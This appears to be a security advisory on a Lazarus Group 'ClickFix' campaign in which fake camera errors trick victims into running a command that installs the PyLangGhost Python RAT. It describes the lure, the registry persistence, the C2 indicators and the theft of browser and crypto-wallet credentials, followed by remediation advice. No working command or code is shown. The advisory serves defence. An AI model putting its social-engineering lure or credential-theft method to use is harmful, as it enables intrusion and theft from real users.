Analysis Summary

In a newly uncovered social engineering campaign, North Korea’s Lazarus Group has been found leveraging fake camera and microphone errors to trick targets into executing malicious scripts, primarily targeting individuals in the finance and technology sectors. Victims are invited to fake remote interviews or technical assessments that appear to fail due to system issues. Under the pretense of resolving these errors, such as a fake “Race Condition in Windows Camera Discovery Cache,” users are manipulated into pasting shell commands into their terminals or Run dialogs. This initiates the download and execution of a ZIP archive containing a Python-based remote access trojan (RAT), dubbed PyLangGhost.

According to the Researcher, unlike traditional phishing or malware delivery techniques, the campaign named “ClickFix” relies on real-time deception and human interaction to create a sense of urgency. The user is shown continuous pop-up errors and is prompted to run a one-liner Windows command that silently downloads a ZIP file from a deceptive domain (https://360scanner.store/cam-v-b74si.fix). This archive includes a renamed Python interpreter, VBScript (update.vbs), and Python modules. The script sets up persistence using the Windows registry key Software\Microsoft\Windows\CurrentVersion\Run\csshost, and contacts a C2 server at IP 151.243.101.229 via HTTP to exfiltrate data or receive commands.

The Python script (nvidia.py) executed by the trojan imports various modules: api.py, command.py, util.py, and auto.p,y which handle system interaction, encrypted communication using RC4 and MD5, and credential theft. One of the key capabilities of PyLangGhost is its ability to extract Chrome browser-stored credentials and data from cryptocurrency extensions like MetaMask and Coinbase Wallet. The malware uses the Windows DPAPI decryption routine and impersonates lsass.exe to bypass security layers, especially in Chrome versions 20 and above. The stolen data is then encrypted into “qpwoe” packets and sent via repeated HTTP POST requests to the attacker's server.

This campaign demonstrates the Lazarus Group’s evolving tradecraft, combining legacy persistence mechanisms with Python's flexibility and obfuscation features to evade traditional antivirus detection, which initially flagged the malware on just 3 out of 60 engines on VirusTotal. Security teams are strongly advised to monitor for abnormal outbound traffic, especially to unfamiliar IPs, implement strict application whitelisting, and conduct user awareness training to avoid falling victim to remote "troubleshooting" scams. Behavior-based sandboxing platforms such as Any .Run have proven vital for early detection and analysis of such stealthy threats.

Impact

• Exfiltration of Sensitive Data
• Gain Access
• Security Bypass

Indicators of Compromise

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Instruct users never to run unfamiliar commands in Terminal, PowerShell, or Run dialogs without verification from IT/security teams.
• Block known malicious IPs, including 151.243.101.229, at the firewall or proxy level.
• Monitor for suspicious outbound HTTP connections to unknown IPs or domains like 360scanner.store.
• Use behavior-based security solutions (e.g., Any.Run, sandboxing tools) to detect unusual script or process behavior.
• Enforce application whitelisting to prevent unauthorized execution of scripts and unknown binaries.
• Restrict PowerShell and VBScript execution through Group Policy or endpoint security settings.
• Audit and monitor Windows Registry keys, especially HKCU\Software\Microsoft\Windows\CurrentVersion\Run for suspicious entries like csshost.
• Use endpoint detection and response (EDR) tools that can flag renamed Python interpreters or unknown binaries.
• Regularly clear browser stored credentials and discourage storing passwords in web browsers.
• Harden Chrome browser settings and restrict access to sensitive extensions like cryptocurrency wallets.
• Keep systems and browsers updated to prevent privilege escalation through known vulnerabilities.
• Implement network segmentation to limit lateral movement in case of initial infection.
• Enable multi-factor authentication (MFA) on all critical accounts to reduce the impact of credential theft.
• Perform threat hunting for unusual Python executions or VBScript activity in endpoint logs.